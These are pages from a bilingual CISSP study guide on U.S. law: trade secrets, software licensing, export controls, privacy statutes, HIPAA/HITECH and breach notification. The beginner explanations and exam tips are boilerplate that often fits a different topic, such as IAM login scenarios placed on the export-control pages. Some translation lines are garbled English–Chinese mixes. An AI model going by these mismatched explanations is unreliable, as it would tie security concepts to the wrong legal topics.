排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
学习单元 20 / PDF P292

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Economic Espionage Trade secrets are often the crown jewels of major corporations, and the U.S. government recognized the importance of protecting this type of intellectual property when Congress enacted the Economic Espionage Act of 1996. This law has these two major provisions: Any individual found guilty of stealing trade secrets from a U.S. corporation with the intention of benefiting a foreign government or agent may be fined up to $500,000 and imprisoned for up to 15 years. Organizations found guilty may be fined up to $10,000,000. Any individual found guilty of stealing trade secrets under other circumstances may be fined and imprisoned for up to 10 years.

Organizations found guilty may be fined up to $5,000,000. The terms of the Economic Espionage Act give true teeth to the intellectual property rights of trade secret owners. Enforcing this law requires that companies take adequate steps to ensure that their trade secrets are well protected and not accidentally placed into the public domain. The law was extended by the Defend Trade Secrets Act of 2016. The original Economic Espionage Act required that the government bring criminal enforcement charges. The Defend Trade Secrets Act added a civil right of action, allowing companies to file a civil suit in federal court claiming theft of trade secrets.

Software Licensing As the software industry has evolved, so too have the complexities surrounding software licensing. Today's security professionals must navigate a landscape of diverse licensing options and agreements. Here are some contemporary software licensing types: Perpetual Licenses This type of license allows users to pay a onetime fee for the software and use it indefinitely without any time limitations. Typically, support and updates might require additional fees.

中文直译 / 整理

经济间谍 商业秘密往往是大型企业的核心资产,美国国会在1996年通过《经济间谍 法》时,便认识到了保护此类知识产权的重要性。 该法律包含以下两项主 要规定: 任何被认定为窃取美国公司商业秘密并意图使外国政府或代理人获益 的个人,可能被处以最高50万美元的罚款,并监禁最多15年。 被认定 有罪的组织可能被处以最高1000万美元的罚款。 任何被认定为在其他情况下窃取商业秘密的个人,可能被处以罚款并 监禁最多10年。 被认定有罪的组织可能被处以最高500万美元的罚款。 《经济间谍法》的条款赋予了商业秘密所有者真正的知识产权保护力度。 执行该法律要求公司采取充分措施,确保其商业秘密得到妥善保护,避 免意外进入公共领域。 2016年《保护商业秘密法》扩展了该法律。 原始的《经济间谍法》要求政 府提起刑事起诉。 《保护商业秘密法》增加了民事诉讼权利,允许公司在 联邦法院提起民事诉讼,指控商业秘密被盗。 软件许可 随着软件行业的演变,软件许可所涉及的复杂性也在不断增加。 当今的安全专 业人员必须应对多种多样的许可选项和协议。 以下是几种当代软件许可类型: 永久许可证 这种许可证允许用户支付一次性费用以获取软件,并无限期使用, 无时间限制。

通常,支持和更新可能需要额外费用。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 21 / PDF P293

第 293 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Subscription Licenses Unlike perpetual licenses, subscription licenses are time-bound. Users pay a recurring fee to use the software, often monthly or annually. This often includes updates and support as part of the subscription. Open-Source Licenses Open-source software is usually free to use, modify, and distribute. However, there are various open source licenses, each with its conditions, like the GNU General Public License (GPL) or the MIT License. Freeware Software that is available free of charge. It might come with restrictions on usage or lack features available in a paid version.

Enterprise License Agreements (ELAs) These are comprehensive agreements between software vendors and large organizations. ELAs allow for the deployment of software throughout the organization under favorable terms, often at a discounted price. End-User License Agreements (EULAs) EULAs define the rights and restrictions that apply when using the software. These are typically presented during the installation or initial setup process. Concurrent Use Licenses This allows a set number of users to access the software at the same time. Once the limit is reached, additional users must wait until a slot becomes available.

Named User Licenses This type of license is tied to specific users, typically identified by their login credentials, ensuring only designated individuals can access the software. Cloud Services License Agreements These agreements pertain to software-as-a-service (SaaS) provided over the Internet. Users often encounter them when registering for online services. The agreement might present as a link to terms or flash legal information on the screen, requiring user affirmation before accessing the service. Industry groups provide guidance and enforcement activities regarding software licensing. You can get more information from their websites.

One major group is the Software Alliance at http://bsa.org.

中文直译 / 整理

订阅许可证 与永久许可证不同,订阅许可证具有时间限制。 用户需支付 定期费用以使用软件,通常按月或按年支付。 这通常包括更新和支持作为 订阅的一部分。 开源许可证开源软件通常可以免费使用、修改和分发。 然而,存在多种开 源许可证,每种都有其特定条件,例如 GNU 通用公共许可证(GPL)或 MIT 许可证。 免费软件免费提供的软件。 它可能在使用方面存在限制,或缺少付费版本中的 某些功能。 企业许可协议(ELAs)这是软件供应商与大型组织之间的综合性协议。 ELA 允许组织在优惠条款下部署软件,通常享有折扣价格。 最终用户许可协议(EULAs)EULA 定义了使用软件时适用的权利和限制。 这些协议通常在安装或初始设置过程中显示。 并发使用许可证此许可证允许一定数量的用户同时访问软件。 一旦 达到限制,其他用户必须等待有空闲名额时才能使用。 命名用户许可证此类许可证与特定用户绑定,通常通过其登录凭据识别, 确保只有指定人员可以访问软件。 云服务许可协议 这些协议涉及通过互联网提供的软件即服务(SaaS)。 用 户在注册在线服务时通常会遇到这些协议。

协议可能以条款链接的形式出现, 或在屏幕上闪现法律信息,要求用户确认后方可访问服务。 行业组织提供有关软件许可的指导和执法活动。 您可以通过其网站获 取更多信息。 一个主要的组织是软件联盟,网址为http://bsa.org。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 293 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 22 / PDF P294

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Import/Export The federal government recognizes that the very same computers and encryption technologies that drive the Internet and e-commerce can be extremely powerful tools in the hands of a military force. For this reason, during the Cold War, the government developed a complex set of regulations governing the export of sensitive hardware and software products to other nations. The regulations include the management of transborder data flow of new technologies, intellectual property, and personally identifiable information (PII). Until recently, it was difficult to export high-powered computers outside the United States, except to a select handful of allied nations.

The controls on exporting encryption software were even more severe, rendering it virtually impossible to export any encryption technology outside the country. Recent changes in federal policy have relaxed these restrictions and provided for more open commerce. Two sets of federal regulations governing imports and exports are of particular interest to cybersecurity professionals: The International Traffic in Arms Regulations (ITAR) controls the manufacture, export, and import of items that are specifically designated as military and defense items, including technical information related to those items.

The items covered under ITAR appear on a list called the United States Munitions List (USML), maintained in 22 CFR 121. The Export Administration Regulations (EAR) cover a broader set of items that are designed for commercial use but may have military applications. Items covered by EAR appear on the Commerce Control List (CCL) maintained by the U.S. Department of Commerce. Notably, EAR includes an entire category covering information security products. Countries of Concern Currently, U.S. firms can export high-performance computing systems to virtually any country without receiving prior approval from the government.

There are exceptions to this rule for countries designated by the Department of Commerce's Bureau of Industry and Security (BIS) as countries of concern based on the fact that they pose a threat of nuclear proliferation, they are classified as state sponsors of terrorism, or other concerns. These countries include Cuba, Iran, North Korea, and Syria.

中文直译 / 整理

导入/导出 联邦政府认识到,推动互联网和电子商务的相同计算机和加密技术,在军事力 量手中可能成为极其强大的工具。 因此,在冷战期间,政府制定了一套复杂的 法规,规范向其他国家出口敏感的硬件和软件产品。 这些法规包括对新技术、 知识产权和个人身份信息(PII)的跨境数据流动的管理。 直到最近,将高性能计算机出口到美国境外仍十分困难,仅限于少数几个盟 国。 对加密软件出口的管控更为严格,几乎不可能将任何加密技术出口到国 外。 最近联邦政策的调整放宽了这些限制,促进了更加开放的贸易。 有两套联邦法规对网络安全专业人员特别重要: 《国际武器贸易条例》(ITAR)管制专门指定为军事和国防物品的制造、 出口和进口,包括与这些物品相关的技术信息。 受ITAR管制的物品列于 《美国军品清单》(USML)中,该清单载于22 CFR 121。 《出口管理条例》(EAR)涵盖一系列设计用于商业用途但可能具有军事 用途的物品。 受EAR管制的物品列于美国商务部维护的《商业管制清单》 (CCL)中。 值得注意的是,EAR包含一个专门涵盖信息安全产品的类别。 关注国家 目前,美国公司可以向几乎所有国家出口高性能计算系统,而无需获得政府的 事先批准。

然而,对于美国商务部工业与安全局(BIS)根据其构成核扩散威 胁、被列为恐怖主义支持国或其他相关顾虑而指定为关注国家的国家,此规则 存在例外。 这些国家包括古巴、伊朗、朝鲜和叙利亚。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 23 / PDF P295

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

You can find a list of countries and their corresponding computer export tiers on the Department of Commerce's website at www.bis.doc.gov. Encryption Export Controls The Department of Commerce's Bureau of Industry and Security (BIS) sets forth regulations on the export of encryption products outside the United States. Under previous regulations, it was virtually impossible to export even relatively low-grade encryption technology outside the United States. This placed U.S. software manufacturers at a great competitive disadvantage to foreign firms that faced no similar regulations.

After a lengthy lobbying campaign by the software industry, the president directed the Commerce Department to revise its regulations to foster the growth of the American security software industry. If you're thinking to yourself, “These regulations are confusing and overlapping,” you're not alone! Export controls are a highly specialized area of the law that require expert legal advice if you encounter them in your work. Current regulations now designate the categories of retail and mass market security software. The rules now permit firms to submit these products for review by the Commerce Department, but the review is supposed to take no longer than 30 days.

After successful completion of this review, companies may freely export these products. However, government agencies often exceed legislated deadlines, and companies must either wait until the review is complete or take the matter to court in an attempt to force a decision. Privacy The right to privacy has for years been a hotly contested issue in the United States. The main source of this contention is that the Constitution's Bill of Rights does not explicitly provide for a right to privacy. However, this right

中文直译 / 整理

您可以在美国商务部网站上找到国家及其对应计算机出口等级的列 表,网址为www.bis.doc.gov。 加密出口管制 美国商务部工业与安全局(BIS)制定了有关将加密产品出口至美国境外的法 规。 根据以往的规定,几乎不可能将即使是相对低级别的加密技术出口到美国 境外。 这使美国软件制造商在与不受类似法规约束的外国公司竞争时处于巨大 劣势。 在软件行业经过长时间的游说后,总统指示商务部修订其法规,以促进 美国安全软件产业的发展。 如果你心里想着:“这些法规混乱且重叠”,你并不孤单! 出口管制 是法律中一个高度专业化的领域,如果在工作中遇到此类问题,需要寻求 专业法律建议。 现行法规现已将零售和大众市场安全软件列为类别。 新规允许企业将这些产品 提交给商务部审查,但审查时间应不超过30天。 在成功完成审查后,企业可自 由出口这些产品。 然而,政府机构经常超过法定期限,企业要么必须等待审查 完成,要么诉诸法院以迫使作出决定。 隐私 多年来,隐私权一直是美国一个激烈争议的问题。 这一争议的主要原因是 《宪法》权利法案并未明确赋予隐私权。 然而,这一权利

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 24 / PDF P296

第 296 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

has been upheld by numerous courts and is vigorously pursued by organizations such as the American Civil Liberties Union (ACLU). Europeans have also long been concerned with their privacy. Indeed, countries such as Switzerland are world renowned for their ability to keep financial secrets. Later in this chapter, we'll examine how the European Union (EU) data privacy laws impact companies and Internet users. U.S.

Privacy Law Although there is no explicit constitutional guarantee of privacy, a myriad of federal laws (many enacted in recent years) are designed to protect the private information the government maintains about citizens as well as key portions of the private sector such as financial, educational, and healthcare institutions. In the following sections, we'll examine a number of these federal laws. Fourth Amendment The basis for privacy rights is in the Fourth Amendment to the U.S. Constitution.

It reads as follows: The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized. The direct interpretation of this amendment prohibits government agents from searching private property without a warrant and probable cause. The courts have expanded their interpretation of the Fourth Amendment to include protections against wiretapping and other invasions of privacy.

Privacy Act of 1974 The Privacy Act of 1974 is perhaps the most significant piece of privacy legislation restricting the way the federal government may deal with private information about individual citizens. The Privacy Act mandates that U.S. federal agencies maintain only the records that are necessary for conducting their business and that they destroy those records when they are no longer needed for a legitimate function of government. It provides a formal procedure for individuals to gain access to records the government maintains about them and to request that incorrect records be amended.

It also severely limits the ability of federal government agencies to disclose private information to

中文直译 / 整理

已被众多法院 upheld,并受到美国公民自由联盟(ACLU)等组织的 积极维护。 欧洲人长期以来也一直关注他们的隐私。 事实上,像瑞士这样的国家因其 保护金融秘密的能力而闻名世界。 在本章后续部分,我们将探讨欧洲联盟 (EU)的数据隐私法律如何影响企业和互联网用户。 美国隐私法 尽管宪法中没有明确的隐私权保障,但众多联邦法律(许多是近年来颁布的) 旨在保护政府所持有的公民私人信息,以及金融、教育和医疗保健等关键私营 部门的部分信息。 在以下章节中,我们将考察这些联邦法律中的若干项。 第四修正案 的基础是 privac y rights is in the Fourth 美国宪法修正案。 其内容如下: 人民的人身、住宅、文件和财产不受无理搜查和扣押的权利,不得侵犯。 除依据合理根据,经宣誓或郑重声明,并特别说明需搜查的地点和需扣 押的人或物外,不得签发搜查令。 对该修正案的直接解释禁止政府人员在无搜查令和合理根据的情况下搜 查私人财产。 法院已将第四修正案的解释扩展至包括对窃听和其他侵犯 隐私行为的保护。 1974年《隐私法》1974年《隐私法》可能是最重要的隐私立法,它限制了 联邦政府处理有关公民个人隐私信息的方式。

《隐私法》规定,美国联邦 机构只能保存与其业务相关的必要记录,并在这些记录不再用于政府的合 法职能时予以销毁。 该法为个人提供了正式程序,以获取政府保存的关于 他们的记录,并请求更正错误的记录。 它还严格限制了联邦政府机构向

小白解释

场景先行:你是公司的安全负责人,正在读第 296 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 296 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 25 / PDF P297

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

other people or agencies without the prior written consent of the affected individuals. It does provide for exceptions involving the census, law enforcement, the National Archives, health and safety, and court orders. The Privacy Act of 1974 applies only to federal government agencies. Many people misunderstand this law and believe that it applies to how companies and other organizations handle sensitive personal information, but that is not the case. Electronic Communications Privacy Act of 1986 The Electronic Communications Privacy Act (ECPA) makes it a crime to invade the electronic privacy of an individual.

This act broadened the Federal Wiretap Act, which previously covered communications traveling via a physical wire, to apply to any illegal interception of electronic communications or to the intentional, unauthorized access of electronically stored data. It prohibits the interception or disclosure of electronic communication and defines those situations in which disclosure is legal. It protects against the monitoring of email and voicemail communications and prevents providers of those services from making unauthorized disclosures of their content. One of the most notable provisions of the ECPA is that it makes it illegal to monitor mobile telephone conversations.

In fact, such monitoring is punishable by a fine of up to $500 and a prison term of up to five years. Communications Assistance for Law Enforcement Act (CALEA) of 1994 The Communications Assistance for Law Enforcement Act (CALEA) of 1994 amended the Electronic Communications Privacy Act of 1986. CALEA requires all communications carriers to make wiretaps possible for law enforcement with an appropriate court order, regardless of the technology in use. Economic Espionage Act of 1996 The Economic Espionage Act of 1996 extends the definition of property to include proprietary economic information so that the theft of this information can be considered industrial or corporate espionage.

This changed the legal definition of theft so that it was no longer restricted by physical constraints. Health Insurance Portability and Accountability Act of 1996 In 1996, Congress passed the Health Insurance Portability and

中文直译 / 整理

其他个人或机构披露私人信息的能力,除非获得相关个人的事先书面同意。 该法也 规定了若干例外情况,包括人口普查、执法、国家档案馆、健康与安全以及法院命 令。 1974年《隐私法》仅适用于联邦政府机构。 许多人误解了这 项法律,认为它适用于公司和其他组织处理敏感个人信息的方式, 但事实并非如此。 1986年电子通信隐私法《电子通信隐私法》(ECPA)规定,侵犯个人电 子隐私属于犯罪行为。 该法扩大了此前仅涵盖通过物理线路传输的通信的 《联邦电子监听法》的适用范围,将其延伸至任何非法拦截电子通信或故 意、未经授权访问电子存储数据的行为。 它禁止拦截或披露电子通信,并 规定了哪些情况下披露是合法的。 该法保护电子邮件和语音邮件通信不被 监控,并防止服务提供商未经授权披露其内容。 ECPA最显著的条款之一是,它规定监听移动电话通话属于违法行为。 事 实上,此类监控行为可处以最高500美元的罚款和最高五年的监禁。 1994年通信协助执法法(CALEA) 1994年通信协助执法法(CALEA)对 1986年的电子通信隐私法进行了修订。

CALEA要求所有通信运营商在获得 适当法院命令的情况下,无论使用何种技术,都必须使执法部门能够进行电 话窃听。 1996年经济间谍法 1996年经济间谍法将财产的定义扩展至包括专有的经 济信息,以便此类信息的窃取可被视为工业或企业间谍行为。 这改变了盗 窃的法律定义,使其不再受物理限制的约束。 1996年健康保险可携带性和责任法案 1996年,国会通过了健康保险可携带性和

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

问责性:问责性要求能把行为绑定到具体主体。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

问责依赖识别、认证、授权、审计和记账共同工作。

ISO 偏标准和管理体系。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
问责性 问责性要求能把行为绑定到具体主体。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 26 / PDF P298

第 298 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Accountability Act (HIPAA), which made numerous changes to the laws governing health insurance and health maintenance organizations (HMOs). Among the provisions of HIPAA are privacy and security regulations requiring strict security measures for hospitals, physicians, insurance companies, and other organizations that process or store private medical information about individuals. HIPAA also clearly defines the rights of individuals who are the subject of medical records and requires organizations that maintain such records to disclose these rights in writing. The HIPAA privacy and security regulations are quite complex.

You should be familiar with the broad intentions of the act, as described here. If you work in the healthcare industry, consider devoting time to an in-depth study of this law's provisions. Health Information Technology for Economic and Clinical Health Act of 2009 In 2009, Congress amended HIPAA by passing the Health Information Technology for Economic and Clinical Health (HITECH) Act. This law updated many of HIPAA's privacy and security requirements and was implemented through the HIPAA Omnibus Rule in 2013.

One of the changes mandated by the new regulations is a change in the way the law treats business associates, which are organizations that handle protected health information (PHI) on behalf of a HIPAAcovered entity. Any relationship between a covered entity and a business associate must be governed by a written contract known as a business associate agreement (BAA). Under the new regulation, business associates are directly subject to HIPAA and HIPAA enforcement actions in the same manner as a covered entity. HITECH also introduced new data breach notification requirements.

Under the HITECH Breach Notification Rule, HIPAA-covered entities that experience a data breach must notify affected individuals of the breach and must also notify both the Secretary of Health and Human Services and the media when the breach affects more than 500 individuals. In those cases, notification must take place without

中文直译 / 整理

责任法案(HIPAA),该法案对规范健康保险和健康维护组织( HMOs)的法律进行了多项修改。 HIPAA的条款包括隐私和安全规定, 要求医院、医生、保险公司及其他处理或存储个人医疗信息的组织采取严 格的安全措施。 HIPAA还明确定义了医疗记录主体的个人权利,并要求保存此类记录的 组织以书面形式披露这些权利。 HIPAA的隐私和安全法规相当复杂。 您应熟悉此处所述的该法案 的总体意图。 如果您从事医疗行业,建议花时间深入研究该法律的各 项规定。 2009年经济与临床健康信息技术法案 2009年,国会通过了《2009年经济 与临床健康信息技术法案》(HITECH法案),对HIPAA进行了修订。 该 法律更新了HIPAA的许多隐私和安全要求,并于2013年通过HIPAA综合 规则得以实施。 新法规所规定的一项变更,是改变了法律对业务伙伴的处理方式。 业务伙 伴是指代表HIPAA覆盖实体处理受保护健康信息(PHI)的组织。 任何覆 盖实体与业务伙伴之间的关系都必须由一份称为业务伙伴协议(BAA)的 书面合同来规范。 根据新法规,业务伙伴与覆盖实体一样,直接受 HIPAA约束并面临HIPAA的执法行动。

HITECH 还引入了新的数据泄露通知要求。 根据 HITECH 泄露通知 规则,发生数据泄露的 HIPAA 覆盖实体必须通知受影响的个人,并且 当泄露影响超过 500 人时,还必须通知卫生与公共服务部部长和媒体。 在这些情况下,通知必须在

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

问责性:问责性要求能把行为绑定到具体主体。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 298 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

问责依赖识别、认证、授权、审计和记账共同工作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
问责性 问责性要求能把行为绑定到具体主体。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 27 / PDF P299

第 299 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

unreasonable delay and no more than 60 days after discovery of the breach. Data Breach Notification Laws HITECH's data breach notification rule is unique in that it is a federal law mandating the notification of affected individuals. Outside of this requirement for healthcare records, data breach notification requirements vary widely from state to state. In 2002, California passed the Senate Bill SB 1386 and became the first state to immediately disclose to individuals the known or suspected breach of personally identifiable information.

This includes unencrypted copies of a person's name in conjunction with any of the following information: Social Security number Driver's license number State identification card number Account number, credit or debit card number, in combination with any required security code, access code, or password that would permit access to an individual's financial account. In the years following SB 1386, other states passed similar laws modeled on the California data breach notification law. In 2018, 16 years after the passage of SB 1386, Alabama and South Dakota became the last two states to pass data breach notification laws.

For a complete listing of state data breach notification laws, see www.ncsl.org/research/telecommunications-andinformation-technology/security-breach-notification-laws.aspx. Children's Online Privacy Protection Act of 1998 In April 2000, provisions of the federal Children's Online Privacy Protection Act (COPPA) became the law of the land in the United States. COPPA makes a series of demands on websites that cater to children or knowingly collect information from children:

中文直译 / 整理

